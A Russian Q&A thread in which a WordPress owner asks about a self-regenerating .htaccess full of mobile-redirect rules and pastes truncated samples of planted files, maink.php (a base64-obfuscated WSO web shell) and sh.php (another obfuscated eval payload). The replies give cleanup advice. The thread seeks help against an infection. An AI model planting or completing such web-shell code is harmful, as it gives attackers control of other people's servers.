# Автоматически изменяется/создаётся .htaccess

Tags: .htaccess, wordpress

На хостинге, на котором лежит сайт на вордпресс, есть файл .htaccess.
В нём прописана переадресация на страницу 404.php (одна строка).
По какой-то непонятно причине файл постоянно самопроизвольно изменяется.
В нём удаляется нужный код и появляются сотни строк странного кода типа:

```
=<<<CODE
RewriteEngine on

RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (mini\ 9.5|vx1000|lge\ |m800|e860|u940|ux840|compal|wireless|\ mobi|ahong|lg380|lgku|lgu900|lg210|lg47|lg920|lg840|lg370|sam-r|mg50|s55|g83|t66|vx400|mk99|d615|d763|el370|sl900|mp500|samu3|samu4|vx10|xda_|samu5|samu6|samu7|samu9|a615|b832|m881|s920|n210|s700|c-810|_h797|mob-x|sk16d|848b|mowser|s580|r800|471x|v120|rim8|c500foma:|160x|x160|480x|x640|t503|w839|i250|sprint|w398samr810|m5252|c7100|mt126|x225|s5330|s820|htil-g1|fly\ v71|s302|-x113|novarra|k610i|-three|8325rc|8352rc|sanyo|vx54|c888|nx250|n120|mtk\ |c5588|s710|t880|c5005|i;458x|p404i|s210|c5100|teleca|s940|c500|s590|foma|samsu|vx8|vx9|a1000|_mms|myx|a700|gu1100|bc831|e300|ems100|me701|me702m-three|sd588|s800|8325rc|ac831|mw200|brew\ |d88|htc\/|htc_touch|355x|m50|km100|d736|p-9521|telco|sl74|ktouch|m4u\/|me702|8325rc|kddi|phone|lg\ |sonyericsson|samsung|240x|x320|vx10|nokia|sony\ cmd|motorola|up.browser|up.link|mmp|symbian|smartphone|midp|wap|vodafone|o2|pocket|mobile|treo) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(1207|3gso|4thp|501i|502i|503i|504i|505i|506i|6310|6590|770s|802s|a\ wa|acer|acs-|airn|alav|asus|attw|au-m|aur\ |aus\ |abac|acoo|aiko|alco|alca|amoi|anex|anny|anyw|aptu|arch|argo|bell|bird|bw-n|bw-
```

Если я вообще удаляю файл .htaccess, он через некоторое время всё-равно появляется
с таким же содержимым.

При вышеприведенном содержимом на сайте постоянно ошибка "Internal server error".

Что это такое? Как решить проблему?

P.S. Также в теме вордпресса появляются непонятные файлы:

maink.php c содержимым типа

```
<?php eval(base64_decode('
JGF1dGhfcGFzcyA9ICIxNWY4MzI5NmE1NWJiNmY5YmI3NzMyOWE1YzZhZDhiNyI7CiRjb2xvciA9ICIjZGY1IjsKJGRlZmF1bHRfYWN0aW9uID0gJ0ZpbGVzTWFuJzsKJGRlZmF1bHRfdXNlX2FqYXggPSB0cnVlOwokZGVmYXVsdF9jaGFyc2V0ID0gJ1dpbmRvd3MtMTI1MSc7CgppZighZW1wdHkoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSkgewogICAgJHVzZXJBZ2VudHMgPSBhcnJheSgiR29vZ2xlIiwgIlNsdXJwIiwgIk1TTkJvdCIsICJpYV9hcmNoaXZlciIsICJZYW5kZXgiLCAiUmFtYmxlciIpOwogICAgaWYocHJlZ19tYXRjaCgnLycgLiBpbXBsb2RlKCd8JywgJHVzZXJBZ2VudHMpIC4gJy9pJywgJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSkgewogICAgICAgIGhlYWRlcignSFRUUC8xLjAgNDA0IE5vdCBGb3VuZCcpOwogICAgICAgIGV4aXQ7CiAgICB9Cn0KCkBpbmlfc2V0KCdlcnJvcl9sb2cnLE5VTEwpOwpAaW5pX3NldCgnbG9nX2Vycm9ycycsMCk7CkBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwpAc2V0X3RpbWVfbGltaXQoMCk7CkBzZXRfbWFnaWNfcXVvdGVzX3J1bnRpbWUoMCk7CkBkZWZpbmUoJ1dTT19WRVJTSU9OJywgJzIuNScpOwoKaWYoZ2V0X21hZ2ljX3F1b3Rlc19ncGMoKSkgewoJZnVuY3Rpb24gV1NPc3RyaXBzbGFzaGVzKCRhcnJheSkgewoJCXJldHVybiBpc19hcnJheSgkYXJyYXkpID8gYXJyYXlfbWFwKCdXU09zdHJpcHNsYXNoZXMnLCAkYXJyYXkpIDogc3RyaXBzbGFzaGVzKCRhcnJheSk7Cgl9CgkkX1BPU1QgPSBXU09zdHJpcHNsYXNoZXMoJF9QT1NUKTsKICAgICRfQ09PS0lFID0gV1NPc3RyaXBzbGFzaGVzKCRfQ09PS0lFKTsKfQoKZnVuY3Rpb24gd3NvTG9naW4oKSB7CglkaWUoIjxwcmUgYWxpZ249Y2VudGVyPjxmb3JtIG1ldGhvZD1wb3N0PlBhc3N3b3JkOiA8aW5wdXQgdHlwZT1wYXNzd29yZCBuYW1lPXBhc3M+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSc+Pic+PC9mb3JtPjwvcHJlPiIpOwp9CgpmdW5jdGlvbiBXU09zZXRjb29raWUoJGssICR2KSB7CiAgICAkX0NPT0tJRVska10gPSAkdjsKICAgIHNldGNvb2tpZSgkaywgJHYpOwp9CgppZighZW1wdHkoJGF1dGhfcGFzcykpIHsKICAgIGlmKGlzc2V0KCRfUE9TVFsncGFzcyddKSAmJiAobWQ1KCRfUE9TVFsncGFzcyddKSA9PSAkYXV0aF9wYXNzKSkKICAgICAgICBXU09zZXRjb29raWUobWQ1KCRfU0VSVkVSWydIVFRQX0hPU1QnXSksICRhdXRoX3Bhc3MpOwoKICAgIGlmICghaXNzZXQoJF9DT09LSUVbbWQ1KCRfU0VSVkVSWydIVFRQX0hPU1QnXSldKSB8fCAoJF9DT09LSUVbbWQ1KCRfU0VSVkVSWydIVFRQX0hPU1QnXSldICE9ICRhdXRoX3Bhc3MpKQogICAgICAgIHdzb0xvZ2luKCk7Cn0KCmlmKHN0cnRvbG93ZXIoc3Vic3RyKFBIUF9PUywwLDMpKSA9PSAid2luIikKCSRvcyA9ICd3aW4nOwplbHNlCgkkb3MgPSAnbml4JzsKCiRzYWZlX21vZGUgPSBAaW5pX2dldCgnc2FmZV9tb2RlJyk7CmlmKCEkc2FmZV9tb2RlKQogICAgZXJyb3JfcmVwb3J0aW5nKDApOwoKJGRpc2FibGVfZnVuY3Rpb25zID0gQGluaV9nZXQoJ2Rpc2FibGVfZnVuY3Rpb25zJyk7CiRob21lX2N3ZCA9IEBnZXRjd2QoKTsKaWYoaXNzZXQoJF9QT1NUWydjJ10pKQoJQGNoZGlyKCRfUE9TVFsnYyddKTsKJGN3ZCA9IEBnZXRjd2QoKTsKaWYoJG9zID09ICd3aW4nKSB7CgkkaG9tZV9jd2QgPSBzdHJfcmVwbGFjZSgiXFwiLCAiLyIsICRob21lX2N3ZCk7CgkkY3dkID0gc3RyX3JlcGxhY2UoIlxcIiwgIi8iLCAkY3dkKTsKfQppZigkY3dkW3N0cmxlbigkY3dkKS0xXSAhPSAnLycpCgkkY3dkIC49ICcvJzsKCmlmKCFpc3NldCgkX0NPT0tJRVttZDUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKSAuICdhamF4J10pKQogICAgJF9DT09LSUVbbWQ1KCRfU0VSVkVSWydIVFRQX0hPU1QnXSkgLiAnYWpheCddID0gKGJvb2wpJGRlZmF1bHRfdXNlX2FqYXg7CgppZigkb3MgPT0gJ3dpbicpCgkkYWxpYXNlcyA9IGFycmF5KAoJCSJMaXN0IERpcmVjdG9yeSIgPT4gImRpciIsCiAgI
```

и sh.php с содержимым

```
<?php //f8d705de3e14403aa916244fe8be5b5bc8851d49ff70f0946d672bf4ad860a4c674a74fd089b12a3bf2a37ab8f4367c352832cec6d7312fc7673ccb11b4a9e2d8aa1ea9fe57c6993fc935ba71db82507535de8979afa5ff81a69d4c0972a09ec251a9cf3aaa0044d1fce4c288571151e4e95fc15387e919a187cfdf8615b9e73ef647d01217c921927371aa2d0039886de5b2007a622f5a0a6c6f79b4ba2b36e47d5abf210b14d0f721a13c0d5ff177dabd11ca01e04ae0cc06d5a2a0e68db905f2d2c37291b1af6c6eaefc51a7bf6ac3f4dd765da70e654ab457bbc7af91d9786717543efa7f19da6f53e70b58252dd023d0c2f8fae8ab5232c69d7b2dee5d0bbda2f1f6f5cc29fec32e4b98025744fcdb644b42f1874d61fdff2bef129eacc02816d7fbb0f47007d6e4b7cce71e7b6abe9981cb545e2eb78e244ea51f7a5455284e8f1a5fab5e40521a3ec17908115d4be53529b251bea6571281a7b054d77ec9fd45b0adb7c46e2e16633609c30912f506c8455f89a9efd95bec6a82659be14a421c71eb897a15d98cb33356df2c3ce8ad99a2582c55069e1755e7b95a5d1db5fbc87d63518be65470b77019b0c7a755e97d14047aad1dce1fabb31cbb28be22d108f33eeca423d028f0b4de955637255ba845122be65310e6b9cf6f1a002af8efd93c5198bb28fd4da21b7a677093f197a1b9dbc49eb56c693b691aaab437a8e6e9e0052e7d1b506ef8cd16d7083cb1867af25dc09b58e1d6e32830403d1a144f68f9d7cdec1cea2c3aac82106cc5b8ed157dc99d9aa82df9a2e0c0a32fd7138a73e759d41cd6becd39cd8024d5481507a31976fdad259e7d94bdb35fef80a5c6b98496c9a2b1c6308fedae2d22415f7ecd29cfa9ed470e272a335be46171f4fdb37f0fb8338723bcca5a1c70abeec2096ac333bc6ac3969b63e0d980e8ec17f267d3644ce762eee90a62bcdddf190c13f36e31dd4af140005f4da62b22cd9a4a0b6d56237aea342547b1db990b146970a7d8a57b79ccbde63145a002e10d394c4c42cd1122cad4c159f7404e2c79e81b9b855c791bacc8011952312c0b475f23c579f8d8a814ca15e9cff9698f372e48a5458b050d1db41b02f277b7fd6e03f9d043ee4c2d377c383a5e44deb809a4e7f26bfad4656473f2f16b1b5faed70f6effb0ab4f0d9c125959feac2a1184c3dd06bf9b20e47dd5bd7544a1fc393d86b3803ea1ca7dbbd0bb7c47aee89a91c9cf658683e0caaecc704e77ebdacb198b66c4cc2f3200207089269228e8df65bb1ecebe08af0f6d167bf1996a072ff40f85631fe695675873910d91013a1df454c55bef8868fe55b26b8469695fa8cb875ab5592605b0a909469c837a3335ba8aedab7f5c421e2357e74047cb58ae3ecb433ecc3cf642c2eb3d834bfd93250e2211a109e77fa545aa6551e6200693197e71f38dd7b11499e335af3320d36c00b969a26bcc44665478f61227fbbed0898131088ed76f400ac00e4a29e937ba4992206f5c2ae96077bad3cbee783838dd64fc2784de88739d5c36715d1309bb29ae3da097fc54358dc6e3540584f36294bdc9bfa2bdf7442cea54314b81460a8e550aec11805b674d3755efc01018b31b2e7647d6c08be1cd628ccfa217c1825e510ad7d4bc19f877b17cb467e10bddf59183a8eeabb44cbf1e8660001571f515b0b4969a316ef521336bb36903ee4280c4a594e90adc0a6a59ce789b902bf153becd26100ec5c2e48140aa0b49134889d94481b68cc5c55bae0be749f672f6c7fc332df791f276bbf020204aac5db14e24486ae2a69a7cefc0e45b7844dd773fc548b7db7ab2258e36a12aea85e37b66de9b9b14b789d6f1b14c7125256ebf85e3f31058fa299639743690aa2ec7e47789a42cd1fa8acf1d45810f26a4fb142b63df4d0672a8296c8803a1ff1e00d07
eval(base64_decode("Ly9mOGQ3MDVkZTNlMTQ0MDNhYTkxNjI0NGZlOGJlNWI1YmM4ODUxZDQ5ZmY3MGYwOTQ2ZDY3MmJmNGFkODYwYTRjNjc0YTc0ZmQwODliMTJhM2JmMmEzN2FiOGY0MzY3YzM1MjgzMmNlYzZkNzMxMmZjNzY3M2NjYjExYjRhOWUy
```

Comment: Вирусня :)

Comment: А что делать? Как вылечить сайт?

Answer (score 1, accepted):

ищите по коду где упоминается maink, смотрите последние изменения файлов.
и в будущем делайте доступным на запись только те файлы, которые должны быть доступны на запись. хотя я бы в вашем случае сделал бы все файлы в readonly и искал где оно живет :)

Вообще в идеале все удалить нафиг и залить с нуля и последнюю вресию WP

Comment: Значит так и сделаю.

Comment: А о самом главном забыли, ппц! Пароль от фтп поменяйте :)

Comment: @lampa ну ессно)))) а если свой сервер (т.е. не хостинг), то я бы вообще посмотрел созданных пользователей, скрипты во внешне доступных директориях и т.п.